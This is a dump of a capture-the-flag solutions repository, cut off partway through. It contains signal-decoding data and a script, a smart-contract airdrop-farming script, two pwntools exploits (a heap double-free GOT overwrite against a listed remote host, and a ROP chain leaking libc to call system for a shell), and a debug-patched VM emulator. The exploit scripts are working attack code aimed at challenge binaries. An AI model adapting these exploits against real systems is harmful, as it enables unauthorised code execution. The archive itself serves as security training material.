1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914140e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914164e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914188e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914212e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914236e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914264e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914288e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914316e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914340e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914364e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914388e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914412e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914436e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914464e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914488e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914516e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914540e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914564e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914588e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914612e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914636e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914664e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914688e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914716e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914740e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914764e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914788e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914840e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914864e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914892e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914916e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914964e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914988e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915040e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915064e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915116e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915140e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915188e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915212e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915264e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915292e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915340e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915364e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915388e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915412e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915436e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915464e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915488e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915516e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915540e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915564e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915588e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915612e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915636e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915664e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915688e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915716e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915740e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915764e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915812e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915840e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915864e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915888e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915916e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915940e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8915964e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8915988e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916012e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916036e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916060e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916088e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916112e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916136e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916164e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916188e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916212e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916236e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916260e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916288e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916312e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916336e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916388e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916412e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916436e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916460e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916488e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916512e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916536e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916564e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916588e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916612e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916636e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916660e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916688e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916712e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916736e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916764e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916788e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916812e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916836e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916860e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916884e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916912e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916936e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8916964e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8916988e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917012e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917036e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917060e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917084e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917112e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917136e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917164e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917188e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917212e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917236e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917260e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917284e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917312e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917336e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917364e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917388e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917412e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917436e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917460e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917484e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917512e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917536e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917564e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917588e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917612e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917636e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917660e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917684e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917712e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917736e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917764e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917788e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917812e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917836e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917860e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917884e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917912e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917936e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8917964e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8917988e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918012e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918036e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918060e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918084e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918112e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918136e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918164e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918188e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918212e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918236e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918260e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918284e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918312e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918336e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918364e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918388e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918412e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918436e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918460e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918484e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918512e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918536e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918564e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918588e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918612e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918636e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918660e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918684e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918712e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918736e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918764e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918788e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918812e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918836e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918860e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918884e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918912e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918936e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8918964e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8918988e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919012e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919036e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919060e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919084e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919112e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919136e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919164e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919188e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919212e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919236e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919260e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919284e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919312e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919336e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919364e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919388e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919412e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919436e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919460e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919484e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919512e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919536e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919564e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919588e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919612e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919636e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919660e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919688e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919712e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919736e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919764e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919788e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919812e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919836e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919860e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919888e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919912e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919936e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8919964e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8919988e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8920012e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8920036e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8920060e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8920084e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8920112e-02 ================================================ FILE: 2018/35c3-2018/re/box_of_blink/exp.py ================================================ import csv data = [] headers = ['A','B','C','D','E','R1','R2','B1','B2','G1','G2','LAT','CLK','OE','Label'] """ pre = {'A': '0', 'C': '0', 'B': '0', 'E': '0', 'D': '1', 'G1': '0', 'CLK': '0', 'OE': '0', 'R2': '0', 'R1': '0', 'Label': '-1.0000000e-03', 'B1': '0', 'B2': '0', 'LAT': '0', 'G2': '0'} with open('blink.csv') as f: f_csv = csv.DictReader(f) for r in f_csv: flag = False for a in range(len(headers)-1): if pre[headers[a]]!=r[headers[a]]: flag = True break if flag: pre = r data.append(r) print len(data) print data[0:10] with open('blink2.csv','w') as f: f_csv = csv.DictWriter(f, headers) f_csv.writeheader() f_csv.writerows(data) """ """ first = False test = [] with open("blink2.csv") as f: f_csv = csv.DictReader(f) for r in f_csv: now = r['A']+r['B']+r['C']+r['D']+r['E'] if r['CLK']=='1' and r['LAT']=='0': if now=='00001': first = True data.append(r) test.append(1 if r['R1']=='1' else 0) else: if first: break for i in range(2): for j in range(64): print test[i*64+j], print print len(data) with open("test.csv","w") as f: f_csv = csv.DictWriter(f,headers) f_csv.writeheader() f_csv.writerows(data) """ """ pre = "aaaaaaa" with open("blink2.csv") as f: f_csv = csv.DictReader(f) for r in f_csv: if r['OE']=='0' and r['LAT']=='0' and r['CLK']=='1': now = r['A']+r['B']+r['C']+r['D']+r['E'] if now!=pre: data.append(now) pre = now print data print len(data) #data = set(['10000', '10001', '10101', '10100', '01101', '01100', '11111', '11110', '11010', '11011', '01000', '01001', '00111', '00110', '00010', '00011', '10011', '10010', '10110', '10111', '01110', '01111', '11001', '11000', '11100', '11101', '01011', '01010', '00001', '00000', '00100', '00101']) """ test = [] i = 0 res = [] dic = {"000000":0,"101000":0,"010100":0,"001000":0,"100000":0} with open("blink2.csv") as f: f_csv = csv.DictReader(f) for r in f_csv: if r['CLK']=='1': now1 = r['E']+r['D']+r['C']+r['B']+r['A'] now2 = r['R1']+r['R2']+r['G1']+r['G2']+r['B1']+r['B2'] dic[now2]+=1; data.append(' ' if now2=="000000" else '1') if r['LAT']=='1': print i, i+=1 print len(data) #print data res.append(data[:]) data = [] #raw_input( for i in res: a = "".join(i) print a.rjust(128," ") print dic ================================================ FILE: 2018/bctf-2018/blockchain/fake3d/fake.js ================================================ // author: polaris for(var i=0;i<20;i++){ personal.importRawKey(addrs[i],""); } for(var i=0;i<20;i++){ personal.unlockAccount(eth.accounts[i+2],"",100000); } personal.unlockAccount(eth.accounts[1],"",100000); for(var i=0;i<20;i++){ eth.sendTransaction({from:eth.accounts[1], to:eth.accounts[i+2], value: web3.toWei(0.1, "ether")}); } for(var j=0;j<20;j++){ for(var i=0;i<20;i++){ metacoin.airDrop({from:eth.accounts[i+2]}); } } var sum=0; for(var i=0;i<20;i++){ console.log(+metacoin.balance(eth.accounts[i+2])); } var token = 0; for(var i=0;i<20;i++){ token = (+metacoin.balance(eth.accounts[i+2])); if(token!=0){ metacoin.transfer(eth.accounts[1],token,{from:eth.accounts[i+2]}); } } console.log(+metacoin.balance(eth.accounts[1])); metacoin.CaptureTheFlag("Znp0Znp0Znp0Znp0QGdtYWlsLmNvbQ==",{from:eth.accounts[1]}); ================================================ FILE: 2018/bctf-2018/pwn/easiest/exp.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' # BCTF{**No_mO7e_EasieR_HEaP_NowadayS!**} from pwn import * context.terminal = ['tmux', 'splitw', '-h'] BINARY = './easiest' TARGET = ('39.96.9.148', 9999) if args.E: # or args.R: LIBC64 = './libc.so.6' else: LIBC64 = '/lib/x86_64-linux-gnu/libc.so.6' if args.R: r = remote(TARGET[0], TARGET[1]) else: r = process(BINARY, env={'LD_PRELOAD':LIBC64}) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) def add(idx, size, data): r.sendlineafter('2 delete \n', '1') r.sendlineafter('(0-11):', str(idx)) r.sendlineafter('Length:', str(size)) r.sendlineafter('C:', data) def del1(idx): r.sendlineafter('2 delete \n', '2') r.sendlineafter('(0-11):', str(idx)) def del2(idx): r.sendlineafter('2 delete \n', '22') r.sendlineafter('(0-11):', str(idx)) code = ELF(BINARY) libc = ELF(LIBC64) add(0, 0x68, 'a'*8) add(1, 0x68, 'a'*8) add(2, 0x68, 'a'*8) del1(0) del1(1) del1(0) add(3, 0x68, p64(0x602045)) add(4, 0x68, 'a') add(5, 0x68, 'a') #attach(0x400a3a) p = '\x7f\x00\x00' p += p64(0x71) p += p64(code.plt['printf'])[:-1] #strtol add(6, 0x68, p) r.sendlineafter('2 delete \n', '%7$p') libc.address = int(r.recv(14), 16) - 0x7a81b log.info('libc base 0x%x' % libc.address) del2(4) del2(5) del2(4) add(9, 0x68, p64(0x602045)) add(10, 0x68, 'a') add(11, 0x68, 'a') p = '\x7f\x00\x00' p += p64(0x71) p += p64(libc.sym['system'])[:-1] #strtol add(0, 0x68, p) r.sendlineafter('2 delete \n', '/bin/sh\x00') r.interactive() ================================================ FILE: 2018/codegate-quals-2018/pwn/BaskinRobins31/solve_baskinrobins31.py ================================================ from pwn import * context.log_level='debug' libc=ELF('../libc-2.23.so') p=process('./BaskinRobins31') #p=remote('ch41l3ng3s.codegate.kr',3131) #gdb.attach(p,'b *0x4008f4') pop_rdi_ret=0x400bc3 got_puts=0x602020 plt_puts=0x4006c0 entry=0x400780 p.recvuntil('(1-3)\n') payload='a'*0xb0+'deadbeef'+p64(0x400bc3) payload+=p64(0x602020)+p64(0x4006c0)+p64(0x400780) p.sendline(payload) p.recvuntil(':( \n') libc_base=u64(p.recv(6).ljust(8,'\x00'))-libc.symbols['puts'] print '[*]'+hex(libc_base) p.recvuntil('(1-3)\n') payload='a'*0xb0+'deadbeef'+p64(0x40087a) payload+=p64(libc_base+0x18CD57)+p64(0)*2+p64(libc_base+libc.symbols['system']) p.sendline(payload) #p.sendline('a'*0xb0+p64(0x7ffe46a82200)) p.interactive() ================================================ FILE: 2018/codegate-quals-2018/pwn/gamebox1/_7amebox_patched.py ================================================ #!/usr/bin/python import random import signal import sys PERM_MAPPED = 0b1000 PERM_READ = 0b0100 PERM_WRITE = 0b0010 PERM_EXEC = 0b0001 TYPE_R = 0 TYPE_I = 1 FLAG_NF = 0b0010 FLAG_ZF = 0b0001 CODE_DEFAULT_BASE = 0x00000 STACK_DEFAULT_BASE = 0xf4000 class Stdin: def read(self, size): res = '' buf = sys.stdin.readline(size) for ch in buf: if ord(ch) > 0b1111111: break if ch == '\n': res += ch break res += ch return res def write(self, data): return None class Stdout: def read(self, size): return None def write(self, data): out = ''.join(map(chr, data)) sys.stdout.write(out) sys.stdout.flush() return len(out) class Register: def __init__(self): self.register = {} self.register_list = ['r0', 'r1', 'r2', 'r3', 'r4', 'r5', 'r6', 'r7','r8', 'r9', 'r10', 'bp', 'sp', 'pc', 'eflags', 'zero'] def init_register(self): for reg_name in self.register_list: self.register[reg_name] = 0 def set_register(self, reg, value): if isinstance(reg, (int, long)) : if reg < len(self.register_list): reg = self.register_list[reg] else: self.terminate("[VM] Invalid register") elif reg not in self.register: self.terminate("[VM] Invalid register") self.register[reg] = value def get_register(self, reg): if isinstance(reg, (int, long)) : if reg < len(self.register_list): reg = self.register_list[reg] else: self.terminate("[VM] Invalid register") elif reg not in self.register: self.terminate("[VM] Invalid register") return self.register[reg] class FileSystem: def __init__(self): self.files = {} def load_file(self, filename): with open(filename, 'rb') as f: print 'ABCD' self.files[filename] = f.read() def open(self, filename): print self.files if filename in self.files: fd = File() fd.set_buffer(self.files[filename]) return fd else: return -1 class File: def __init__(self): self.buffer = '' self.pos = 0 self.size = 0 def set_buffer(self, data): self.buffer = data self.size = len(self.buffer) def read(self, size): res = '' if self.pos >= self.size: return '' if self.pos + size >= len(self.buffer): res += self.buffer[self.pos : ] self.pos = len(self.buffer) else: res += self.buffer[self.pos : self.pos+size] self.pos += size return res def write(self, data): return None class Memory: def __init__(self, size): self.memory = [0 for i in range(size)] self.pages = {} for page in range(0, size, 0x1000): self.pages[page] = 0 def __getitem__(self, key): return self.memory[key] def __setitem__(self, key, val): self.memory[key] = val def get_perm(self, addr): if (addr & 0b111111111000000000000) not in self.pages: return 0 else: return self.pages[addr & 0b111111111000000000000] def set_perm(self, addr, perm): self.pages[addr & 0b111111111000000000000] = perm & 0b1111 def allocate(self, new_perm, addr=None): if addr: if not (self.get_perm(addr) & PERM_MAPPED): self.set_perm(addr, (PERM_MAPPED | new_perm) & 0b1111) return addr else: return -1 for page, perm in self.pages.items(): if not (self.get_perm(page) & PERM_MAPPED): self.set_perm(page, (PERM_MAPPED | new_perm) & 0b1111) return page return -1 def check_permission(self, addr, perm): if self.get_perm(addr) & (PERM_MAPPED | perm): return True else: return False class EMU: def __init__(self): self.config = {'NX':False} self.firmware = None self.is_load = False self.register = Register() self.register.init_register() self.pipeline = [] self.memory = Memory(2 ** 20) self.checkperm = [] self.filesystem = FileSystem() self.syscall_table = [self.sys_s0, self.sys_s1, self.sys_s2, self.sys_s3, self.sys_s4, self.sys_s5] self.op_hander_table = [self.op_x0, self.op_x1, self.op_x2, self.op_x3, self.op_x4, self.op_x5, self.op_x6, self.op_x7, self.op_x8, self.op_x9, self.op_x10, self.op_x11, self.op_x12, self.op_x13, self.op_x14, self.op_x15, self.op_x16, self.op_x17, self.op_x18, self.op_x19, self.op_x20, self.op_x21, self.op_x22, self.op_x23, self.op_x24, self.op_x25, self.op_x26, self.op_x27, self.op_x28, self.op_x29, self.op_x30] def set_timeout(self, timeout = 30): def handler(signum, frame): print 'timeout!' exit(-1) signal.signal(signal.SIGALRM, handler) signal.alarm(timeout) def set_mitigation(self, nx=False): if nx: self.config['NX'] = nx def init_pipeline(self): self.pipeline.append(Stdin()) self.pipeline.append(Stdout()) def load_firmware(self, firm_name): try: with open(firm_name, 'rb') as f: data = f.read() self.firmware = [ord(byte) for byte in data] self.is_load = True if self.config['NX']: stack_perm = PERM_READ | PERM_WRITE else: stack_perm = PERM_READ | PERM_WRITE | PERM_EXEC for i in range(0, len(data) / 0x1000 + 1): self.memory.allocate(PERM_READ | PERM_WRITE | PERM_EXEC, addr=CODE_DEFAULT_BASE + i*0x1000) self.write_memory(CODE_DEFAULT_BASE, self.firmware, len(self.firmware)) for i in range(0, len(data) / 0x1000 + 1): self.memory.set_perm(CODE_DEFAULT_BASE + i*0x1000, PERM_MAPPED | PERM_READ | PERM_EXEC) self.memory.allocate(stack_perm, addr=STACK_DEFAULT_BASE) self.memory.allocate(stack_perm, addr=STACK_DEFAULT_BASE + 0x1000) self.register.set_register('pc', CODE_DEFAULT_BASE) self.register.set_register('sp', STACK_DEFAULT_BASE+0x1fe0) except: self.terminate("[VM] Firmware load error") def bit_concat(self, bit_list): res = 0 for bit in bit_list: res <<= 7 res += bit & 0b1111111 return res def execute(self): try: while 1: cur_pc = self.register.get_register('pc') #print '\n(%04x)' % cur_pc op, op_type, opers, op_size = self.dispatch(cur_pc) if not self.memory.check_permission(cur_pc, PERM_EXEC) or not self.memory.check_permission(cur_pc + op_size - 1, PERM_EXEC): self.terminate("[VM] Can't exec memory") print 'before_excuted_pc : %#x, op_size : %d' % (cur_pc, op_size) self.register.set_register('pc', cur_pc + op_size) if cur_pc == 0x55: print 'r6 %d' % self.register.get_register('r6') if cur_pc == 0x5c: print 'bp %#x' % self.register.get_register('bp') print 'bp %#x' % self.register.get_register('sp') op_handler = self.op_hander_table[op] op_handler(op_type, opers) except: self.terminate("[VM] Unknown error") def dispatch(self, addr): opcode = self.bit_concat(self.read_memory(addr, 2)) op = (opcode & 0b11111000000000) >> 9 if addr==0xf5fa8: print 'BBBBBBBBBBBBBBBBBBBB'+bin(opcode) print 'BBBBBBBBBBBBBBBBBBBB'+bin(op) if op == 0x8: print hex(addr) print hex(opcode) #print self.bit_concat(self.read_memory(0, 0xd8)) if op >= len(self.op_hander_table): self.terminate("[VM] Invalid instruction") op_type = (opcode & 0b00000100000000) >> 8 opers = [] if op_type == TYPE_R: opers.append((opcode & 0b00000011110000) >> 4) opers.append((opcode & 0b00000000001111)) op_size = 2 elif op_type == TYPE_I: opers.append((opcode & 0b00000011110000) >> 4) opers.append(self.read_memory_tri(addr+2, 1)[0]) op_size = 5 else: self.terminate("[VM] Invalid instruction") return op, op_type, opers, op_size def read_memory(self, addr, length): if not length: return [] if self.memory.check_permission(addr, PERM_READ) and self.memory.check_permission(addr + length - 1, PERM_READ): res = self.memory[addr : addr + length] return res else: print 'test1' print '%#x' % addr self.terminate("[VM] Can't read memory") def read_memory_str(self, addr): res = [] length = 0 while 0 not in res: res.append(self.memory[addr + length]) length += 1 res = res[:-1] length -= 1 if not length: return '', 0 if self.memory.check_permission(addr, PERM_READ) and 